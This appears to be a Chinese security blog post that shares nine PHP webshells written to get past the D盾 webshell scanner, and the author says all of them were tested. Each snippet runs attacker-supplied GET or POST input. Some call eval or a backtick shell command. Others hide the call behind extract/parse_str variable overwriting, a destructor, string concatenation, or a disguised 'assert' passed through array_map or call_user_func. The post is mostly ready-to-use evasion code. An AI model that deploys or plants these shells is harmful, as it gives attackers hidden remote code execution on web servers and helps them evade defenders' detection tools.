过D盾的webshell木马分享与解析

  • 内容
  • 相关

前言

       最近在测试过程中遇到了D盾,悲催的发现所有过D盾的webshell都被查杀了。因此就在网上搜索了一些之前可以过D盾的shell,然后将其做了一些变形(有一些shell没有更改),使其可以过D盾。本次一共奉献上9个可过D盾的shell,全部亲测可过。

1.png

2.png

0x01 extract 变量覆盖过D盾

<?php  $a=1;$b=$_POST;extract($b);print_r(`$a`)?>

 

0x02 parse_str 变量覆盖过D盾

<?php  $a=1;$b="a=".$_GET['a'];parse_str($b);print_r(`$a`)?>

 

0x03 __destruct 析构函数过D盾

<?php 

class User
{
  public $name = '';

  function __destruct(){
    eval("$this->name");
  }
}

$user = new User;
$user->name = ''.$_POST['name'];
?>

 

0x04 null 拼接过D盾

<?php

$name = $_GET['name'];

$name1=$name2= null;

eval($name1.$name2.$name);

?>

 

0x05 '' 拼接过D盾

<?php

$name = $_GET['name'];

$name1=$name2= '';

eval($name1.$name2.$name);

?>

 

0x06 '' null 拼接过D盾

<?php
$a = $_GET['a'];
$c = null;
eval(''.$c.$a);

?>

 

0x07 array_map函数过D盾

<?php
function user()
{
$a123 =  chr(97).chr(115).chr(115).chr(101).chr(114).chr(116);
return ''.$a123;
}
$a123 = user();
$x123 =array($_GET['x']);
array_map($a123,$a123 = $x123 );
?>

 

0x08 call_user_func_array函数过D盾

<?php

function a(){
     return 'assert';
}
$a=a();
$aa = array($_GET['x']);
call_user_func_array($a,$a=$aa);
?>

 

0x09 call_user_func函数过D盾

<?php
function a(){
     return 'assert';
}
$a=a();
$aa=$_GET['x'];
call_user_func($a,$a=$aa);
?>

 

本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度已收录『查看详情』

本文链接:过D盾的webshell木马分享与解析 - https://www.15qq.cn/bug_poc/130.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

允许邮件通知

评论

3条评论
  1. avatar

    外卖代运营 Lv.1 Chrome 63.0.3239.132 Chrome 63.0.3239.132 Windows 7 x64 Edition Windows 7 x64 Edition 回复

    支持支持了 谢谢

    广东省深圳市 电信

    1. avatar

      深圳APP开发 Lv.6 Chrome 63.0.3239.132 Chrome 63.0.3239.132 Windows 7 x64 Edition Windows 7 x64 Edition 回复

      支持支持了 谢谢

      广东省深圳市 电信

      1. avatar

        深圳APP开发 Lv.3 Chrome 63.0.3239.132 Chrome 63.0.3239.132 Windows 7 x64 Edition Windows 7 x64 Edition 回复

        学习学习学习了

        广东省深圳市 电信